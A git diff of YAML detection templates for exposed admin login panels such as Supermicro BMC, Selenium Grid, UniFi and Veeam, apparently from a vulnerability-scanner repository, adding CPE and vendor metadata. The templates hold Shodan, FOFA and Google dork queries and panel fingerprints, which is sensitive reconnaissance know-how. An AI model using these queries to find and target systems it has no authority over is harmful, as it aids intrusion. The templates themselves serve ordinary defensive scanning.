a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: title:"ScriptCase" + product: scriptcase + vendor: scriptcase tags: panel,scriptcase + classification: + cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +45,4 @@ http: group: 2 regex: - '(Versão|Version|Versão)\b.*\s(\d.*\d)' -# digest: 4a0a00473045022100a1f63ba4755f71bcfa7a5e4971361942694134f5fbf88f5ab9849e3b0a0f636902202b6055d7de79b5904703e3988e4e2c45dc54156e70e94ef605b9ad4f36407636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a1f63ba4755f71bcfa7a5e4971361942694134f5fbf88f5ab9849e3b0a0f636902202b6055d7de79b5904703e3988e4e2c45dc54156e70e94ef605b9ad4f36407636:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/securepoint-utm.yaml b/http/exposed-panels/securepoint-utm.yaml index b1df1e4f5b..3c9a4d2aa1 100644 --- a/http/exposed-panels/securepoint-utm.yaml +++ b/http/exposed-panels/securepoint-utm.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8" + product: unified_threat_management + vendor: securepoint tags: securepoint,panel http: @@ -35,4 +38,4 @@ http: group: 1 regex: - '\- Admin Interface \- ([0-9. (a-z)]+)<\/title>' -# digest: 490a00463044022063a7d7df3e5b889741fc737b6323a3318d9322824da2cc56ed01422c49ab453002200fe780aa8d57a18b7bfcedb2d29f389ebe159427a65be1b2d09f1c0aba523c9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022063a7d7df3e5b889741fc737b6323a3318d9322824da2cc56ed01422c49ab453002200fe780aa8d57a18b7bfcedb2d29f389ebe159427a65be1b2d09f1c0aba523c9c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/selenium-grid.yaml b/http/exposed-panels/selenium-grid.yaml index a54b63dcb3..92a40125a0 100644 --- a/http/exposed-panels/selenium-grid.yaml +++ b/http/exposed-panels/selenium-grid.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:selenium:selenium_grid:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Selenium Grid" + product: selenium_grid + vendor: selenium tags: panel,unauth,selenium http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed1b56d344ff7af3df60502197ae95aae972a513f7f1496c6d06aa76ccfe1db502205f67fb5887c31692fe723b6fdc2d10fb52f3ca534d248737269af1613b96dcb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed1b56d344ff7af3df60502197ae95aae972a513f7f1496c6d06aa76ccfe1db502205f67fb5887c31692fe723b6fdc2d10fb52f3ca534d248737269af1613b96dcb9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/shoutcast-server.yaml b/http/exposed-panels/shoutcast-server.yaml index b10ab68691..eb5877969f 100644 --- a/http/exposed-panels/shoutcast-server.yaml +++ b/http/exposed-panels/shoutcast-server.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:shoutcast:dnas:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"SHOUTcast Server" + product: dnas + vendor: shoutcast tags: panel http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205eaa3aa1a091838632544741393d5f1f604cad08966daf365bc82f98830f6e03022100f4eea021bfc7826dd075870dc0d0748451a5697b3cfcff9cf5eb5a826873c3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205eaa3aa1a091838632544741393d5f1f604cad08966daf365bc82f98830f6e03022100f4eea021bfc7826dd075870dc0d0748451a5697b3cfcff9cf5eb5a826873c3f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/sitecore-login.yaml b/http/exposed-panels/sitecore-login.yaml index dd20b4d082..4d30ed38ff 100644 --- a/http/exposed-panels/sitecore-login.yaml +++ b/http/exposed-panels/sitecore-login.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Welcome to Sitecore" + product: experience_platform + vendor: sitecore tags: panel,sitecore http: @@ -27,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a93f1e2ad87db51dfd1ec2a831d55a8a8768a6237f04c2effbbea2260403c157022073994c0419ba977adb8c42575e46d6829a9bdc6a4336446da8aad1f470895990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a93f1e2ad87db51dfd1ec2a831d55a8a8768a6237f04c2effbbea2260403c157022073994c0419ba977adb8c42575e46d6829a9bdc6a4336446da8aad1f470895990:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index aea22bd8e5..641f4fc880 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"SoftEther VPN Server" + product: vpn + vendor: softether tags: panel,vpn,softether + classification: + cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 202 -# digest: 490a0046304402200a36a6e1faa606ce97fa5812df11437d36096fd07363f4e2e9f98edf14d1ae4402207cdab6009066338ccc5cfa9a33d8c9bbe38f36c3aac7c07d6982a69b95ebbf6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200a36a6e1faa606ce97fa5812df11437d36096fd07363f4e2e9f98edf14d1ae4402207cdab6009066338ccc5cfa9a33d8c9bbe38f36c3aac7c07d6982a69b95ebbf6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/speedtest-panel.yaml b/http/exposed-panels/speedtest-panel.yaml index 4843147672..574b0b4df3 100644 --- a/http/exposed-panels/speedtest-panel.yaml +++ b/http/exposed-panels/speedtest-panel.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: title:"Speedtest Tracker" + product: speed_test + vendor: speed_test_project tags: speedtest,tracker,panel,login + classification: + cpe: cpe:2.3:a:speed_test_project:speed_test:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022012154c7388107665fc92c1493e926400bfb5b50e5a531817733d3afe1126b40d0221009f67a14c9eb6274d0f124a06338895f40b39032907a4e367386ea223bdb84437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012154c7388107665fc92c1493e926400bfb5b50e5a531817733d3afe1126b40d0221009f67a14c9eb6274d0f124a06338895f40b39032907a4e367386ea223bdb84437:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/sqlbuddy-panel.yaml b/http/exposed-panels/sqlbuddy-panel.yaml index 581f0632dd..5864a422c3 100644 --- a/http/exposed-panels/sqlbuddy-panel.yaml +++ b/http/exposed-panels/sqlbuddy-panel.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:sqlbuddy:sql_buddy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"SQL Buddy" + product: sql_buddy + vendor: sqlbuddy tags: panel,sqlbuddy http: @@ -32,4 +35,4 @@ http: - "status_code == 200" - "contains(body, '<title>SQL Buddy')" condition: and -# digest: 4a0a00473045022100b8d45f945dbce3c8ff16957819540572b9dd3867bc16f9bb2188122d4f77f097022040cbed8e2cbee8677c44590340e91e6171af52cf418242f65d9afacea03cb92a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8d45f945dbce3c8ff16957819540572b9dd3867bc16f9bb2188122d4f77f097022040cbed8e2cbee8677c44590340e91e6171af52cf418242f65d9afacea03cb92a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/steve-login-panel.yaml b/http/exposed-panels/steve-login-panel.yaml index 92bda39a8a..d9f737e5f0 100644 --- a/http/exposed-panels/steve-login-panel.yaml +++ b/http/exposed-panels/steve-login-panel.yaml @@ -11,11 +11,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:steve-community:steve:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" google-query: intitle:"SteVe - Steckdosenverwaltung" + product: steve + vendor: steve-community tags: panel,steve http: @@ -38,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c275b1031dd5354ee638e7d3a7088aec8ff3264a8b51a2c495c243b486871d490220737056ebb43c46e70e40299df8824c125fad35d33b29fa74bc687fd2ed301c0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c275b1031dd5354ee638e7d3a7088aec8ff3264a8b51a2c495c243b486871d490220737056ebb43c46e70e40299df8824c125fad35d33b29fa74bc687fd2ed301c0b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/supermicro-bmc-panel.yaml b/http/exposed-panels/supermicro-bmc-panel.yaml index f69414615d..13cddc318c 100644 --- a/http/exposed-panels/supermicro-bmc-panel.yaml +++ b/http/exposed-panels/supermicro-bmc-panel.yaml @@ -12,10 +12,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:supermicro:x11ssv-m4f:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Supermicro BMC Login" google-query: intitle:"Supermicro BMC Login" + product: x11ssv-m4f + vendor: supermicro tags: panel,supermicro,bmc http: @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b51d87d528106ab5504c97f1340c551c9edd1b6265a89e56caa76d10afa82162022100d60479372628bc477542b9f4d2ef736bcea9b872b732e73a8a0b1550016e1730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b51d87d528106ab5504c97f1340c551c9edd1b6265a89e56caa76d10afa82162022100d60479372628bc477542b9f4d2ef736bcea9b872b732e73a8a0b1550016e1730:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/suprema-biostar-panel.yaml b/http/exposed-panels/suprema-biostar-panel.yaml index 69541ac05b..b5c75905dc 100644 --- a/http/exposed-panels/suprema-biostar-panel.yaml +++ b/http/exposed-panels/suprema-biostar-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Biostar" + product: biostar_2 + vendor: supremainc tags: panel,login,biostar,detect + classification: + cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/telerik-server-login.yaml b/http/exposed-panels/telerik-server-login.yaml index 84a2c44d1e..b97038e5cc 100644 --- a/http/exposed-panels/telerik-server-login.yaml +++ b/http/exposed-panels/telerik-server-login.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Telerik Report Server" + product: telerik_report_server + vendor: progress tags: telerik,panel http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022010a28e0c6d62ad847d63d4f325a6d8fd111b35368ec73c6349e7f0eb91035c1302205e92ea0215aad68755ec5a691851b9de217d1ad550a37165b026b00f848e107a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010a28e0c6d62ad847d63d4f325a6d8fd111b35368ec73c6349e7f0eb91035c1302205e92ea0215aad68755ec5a691851b9de217d1ad550a37165b026b00f848e107a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/teltonika-login.yaml b/http/exposed-panels/teltonika-login.yaml index 3a89fa69f7..18ddfb1eed 100644 --- a/http/exposed-panels/teltonika-login.yaml +++ b/http/exposed-panels/teltonika-login.yaml @@ -11,9 +11,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:teltonika:rut900:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" + product: rut900 + vendor: teltonika tags: panel,teltonika,edb http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1ac58fba7e8845c94f7d38a0b9c724000fa047c8d6cc1e2f1ebd453ec8a188602207a5e3700a10ae417a131cca61b502e01100b3149e629ba92eebc515d9585e529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1ac58fba7e8845c94f7d38a0b9c724000fa047c8d6cc1e2f1ebd453ec8a188602207a5e3700a10ae417a131cca61b502e01100b3149e629ba92eebc515d9585e529:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/temenos-t24-login.yaml b/http/exposed-panels/temenos-t24-login.yaml index 3c17e17f50..f251c1ed97 100644 --- a/http/exposed-panels/temenos-t24-login.yaml +++ b/http/exposed-panels/temenos-t24-login.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:temenos:t24:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"t24 sign in" verified: true + product: t24 + vendor: temenos tags: panel,exposure,temenos http: @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220236670fc6851def7d308fc7e7d2090b10e932e7c54db0d30e14e05401efa2a1c0220706a1c40141e064836c5887be98fd41229bd1ef8bf6112ead2792ddb31482c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220236670fc6851def7d308fc7e7d2090b10e932e7c54db0d30e14e05401efa2a1c0220706a1c40141e064836c5887be98fd41229bd1ef8bf6112ead2792ddb31482c45:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/tenda-11n-wireless-router-login.yaml b/http/exposed-panels/tenda-11n-wireless-router-login.yaml index 0fc6a55341..5fdbafc71c 100644 --- a/http/exposed-panels/tenda-11n-wireless-router-login.yaml +++ b/http/exposed-panels/tenda-11n-wireless-router-login.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-668 + cpe: cpe:2.3:h:tenda:11n:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Tenda 11N Wireless Router Login Screen" google-query: intitle:"Tenda 11N Wireless Router Login Screen" + product: 11n + vendor: tenda tags: panel,tenda http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008809695350f3978b7f857e7e273acd0e1e7a3dc83756d69a15291a004776d240022100895a41fac36de41d2b783f7e88cf13d7a468a938e614122707d95e37113c30c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008809695350f3978b7f857e7e273acd0e1e7a3dc83756d69a15291a004776d240022100895a41fac36de41d2b783f7e88cf13d7a468a938e614122707d95e37113c30c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/tibco-spotfire-panel.yaml b/http/exposed-panels/tibco-spotfire-panel.yaml index 38982ebbcb..f562167335 100644 --- a/http/exposed-panels/tibco-spotfire-panel.yaml +++ b/http/exposed-panels/tibco-spotfire-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: "TIBCO Spotfire Server" + product: spotfire_server + vendor: tibco tags: panel,tibco,login,detect + classification: + cpe: cpe:2.3:a:tibco:spotfire_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - 'content="TIBCO Spotfire' - '/spotfire/ui/' condition: or -# digest: 4b0a00483046022100cfb6388792a0e7a31b123cd3029dbd3e634a6ec584bc2c0ee6185ab87f4d9b0f022100b9638c3326a7b39452695805b750c4e648953789bd2fafe1113c6ae60f706124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cfb6388792a0e7a31b123cd3029dbd3e634a6ec584bc2c0ee6185ab87f4d9b0f022100b9638c3326a7b39452695805b750c4e648953789bd2fafe1113c6ae60f706124:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml index 6fd5d9baa7..da795f1812 100644 --- a/http/exposed-panels/tigase-xmpp-server.yaml +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: title:"Tigase XMPP Server" + product: tigase + vendor: tigase tags: tigase,xmpp,server,panel,exposure + classification: + cpe: cpe:2.3:a:tigase:tigase:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202f5f0d783373878478c3b0613b9cfd77ae9102cfb810640e7a102c2d5e13eac1022028c937d9288d5833676178246e7310ace75c441823f88e29ded7854c3b9e8488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f5f0d783373878478c3b0613b9cfd77ae9102cfb810640e7a102c2d5e13eac1022028c937d9288d5833676178246e7310ace75c441823f88e29ded7854c3b9e8488:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 4975f1f29e..3e7df75bae 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -1,5 +1,5 @@ -id: tiny-rss-panel - +id: tiny-rss-panel + info: name: Tiny RSS Panel - Detect author: userdehghani @@ -12,17 +12,21 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-418614327 + product: tiny_tiny_rss + vendor: tt-rss tags: panel,tiny-rss,login,detect -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code==200' - - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' + classification: + cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code==200' + - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and -# digest: 490a004630440220245d0c3141ee1457aca5389046553a2b3d473e83c038ea05269dfbec590f8b2f022057be7b754f43f0dc143e45929e101b3433b1233176e327568411aae59518d163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220245d0c3141ee1457aca5389046553a2b3d473e83c038ea05269dfbec590f8b2f022057be7b754f43f0dc143e45929e101b3433b1233176e327568411aae59518d163:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/tooljet-panel.yaml b/http/exposed-panels/tooljet-panel.yaml index ea90691150..01bbb8d37b 100644 --- a/http/exposed-panels/tooljet-panel.yaml +++ b/http/exposed-panels/tooljet-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:tooljet:tooljet:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"ToolJet - Dashboard" + product: tooljet + vendor: tooljet tags: panel,tooljet http: @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ea25617bcc247a299e2ba4c7eb0b9ad5530a6dc3dacf699bef63168e21db6c6022015af89b6b5f288cb0758f51d016d8f3ce14bf80f7feba1fe5dd54380bb2b70e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ea25617bcc247a299e2ba4c7eb0b9ad5530a6dc3dacf699bef63168e21db6c6022015af89b6b5f288cb0758f51d016d8f3ce14bf80f7feba1fe5dd54380bb2b70e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/uipath-orchestrator-panel.yaml b/http/exposed-panels/uipath-orchestrator-panel.yaml index d8b64a3995..a680b2165a 100644 --- a/http/exposed-panels/uipath-orchestrator-panel.yaml +++ b/http/exposed-panels/uipath-orchestrator-panel.yaml @@ -1,5 +1,5 @@ -id: uipath-orchestrator-panel - +id: uipath-orchestrator-panel + info: name: UiPath Orchestrator Login Panel - Detect author: righettod @@ -12,24 +12,28 @@ info: verified: true max-request: 1 shodan-query: http.title:"UiPath Orchestrator" + product: orchestrator + vendor: uipath tags: panel,uipath,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/Account/Login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "<title>uipath orchestrator")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:uipath:orchestrator:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/Account/Login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "<title>uipath orchestrator")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '\?(?:version|v)=([0-9.]+)' -# digest: 4b0a00483046022100b2ea407476958b2d9a6c2496dc5fe79140b611289c470696c516a44887aab487022100db30208178a084a88c0d269d8c40f22d7f7f7bb0a96665e429a0542f06fc8738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2ea407476958b2d9a6c2496dc5fe79140b611289c470696c516a44887aab487022100db30208178a084a88c0d269d8c40f22d7f7f7bb0a96665e429a0542f06fc8738:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml index e163560bd7..c3bd70c4c6 100644 --- a/http/exposed-panels/unibox-panel.yaml +++ b/http/exposed-panels/unibox-panel.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:176427349 + product: unibox + vendor: indionetworks tags: panel,unibox,login + classification: + cpe: cpe:2.3:h:indionetworks:unibox:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220416d0b591a4f31b4b84203f05617ce7889d4af1132a2daabc23cd308944b12fd022100b0693d29d862994d978b591542e82f4dad1e33d020bb7c234b183913bd87d795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220416d0b591a4f31b4b84203f05617ce7889d4af1132a2daabc23cd308944b12fd022100b0693d29d862994d978b591542e82f4dad1e33d020bb7c234b183913bd87d795:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/unifi-panel.yaml b/http/exposed-panels/unifi-panel.yaml index b19b331354..eb4a34e8fe 100644 --- a/http/exposed-panels/unifi-panel.yaml +++ b/http/exposed-panels/unifi-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:ui:unifi_network_application:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"UniFi Network" + product: unifi_network_application + vendor: ui tags: unifi,ubnt,panel http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204dcf29f887e31c036f68c0229d594640c9a9cfb6e91a6480540b279203b6a3bd022033bc5c42ba885fbbda80fd15cce0c5b4e49df0927ddca5564e5027d5cee435a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204dcf29f887e31c036f68c0229d594640c9a9cfb6e91a6480540b279203b6a3bd022033bc5c42ba885fbbda80fd15cce0c5b4e49df0927ddca5564e5027d5cee435a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index 7b3a0b9ffe..b0d21f18db 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: title:"Uptime Kuma" + product: uptime_kuma + vendor: uptime.kuma tags: uptime,kuma,panel,login,detect + classification: + cpe: cpe:2.3:a:uptime.kuma:uptime_kuma:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220313780b1f320d07ea8fa501dc89ba05a76ef6f452ec7c38945a08de5f6c2ee420221008a66fa01c2573c674287635fa610df877d2fce286b2492dc4325410719e2feac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220313780b1f320d07ea8fa501dc89ba05a76ef6f452ec7c38945a08de5f6c2ee420221008a66fa01c2573c674287635fa610df877d2fce286b2492dc4325410719e2feac:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/urbackup-panel.yaml b/http/exposed-panels/urbackup-panel.yaml index c32d498619..9d8a3ad421 100644 --- a/http/exposed-panels/urbackup-panel.yaml +++ b/http/exposed-panels/urbackup-panel.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"UrBackup - Keeps your data safe" + product: urbackup + vendor: urbackup tags: urbackup,panel,login,detect + classification: + cpe: cpe:2.3:a:urbackup:urbackup:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2438fa822bd78e1a3fb2db2967d18e37acc757dffb1d901158aad1ba59680be0220762d7f76021679cdeb4190c83c58634cc7ef989462735e610af58664e0bad1f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2438fa822bd78e1a3fb2db2967d18e37acc757dffb1d901158aad1ba59680be0220762d7f76021679cdeb4190c83c58634cc7ef989462735e610af58664e0bad1f6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/veeam-backup-gcp.yaml b/http/exposed-panels/veeam-backup-gcp.yaml index 71f0d0882a..5c9dfb6f2f 100644 --- a/http/exposed-panels/veeam-backup-gcp.yaml +++ b/http/exposed-panels/veeam-backup-gcp.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:veeam:veeam_backup_for_google_cloud:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Veeam Backup for GCP" + product: veeam_backup_for_google_cloud + vendor: veeam tags: panel,google,cloud http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b2c1ed8ac59003ade8a7d33b337e745b0dfe3f7af6e994fcc2b9b07c88bc326022100f5e895ce0b91a1f7226cfda2dd603397b5e77d744f1c808fb07bde391d921ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b2c1ed8ac59003ade8a7d33b337e745b0dfe3f7af6e994fcc2b9b07c88bc326022100f5e895ce0b91a1f7226cfda2dd603397b5e77d744f1c808fb07bde391d921ae9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/verizon-router-panel.yaml b/http/exposed-panels/verizon-router-panel.yaml index c211610781..16a3d6c839 100644 --- a/http/exposed-panels/verizon-router-panel.yaml +++ b/http/exposed-panels/verizon-router-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:verizon:fios_actiontec_mi424wr-gen31_router_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: 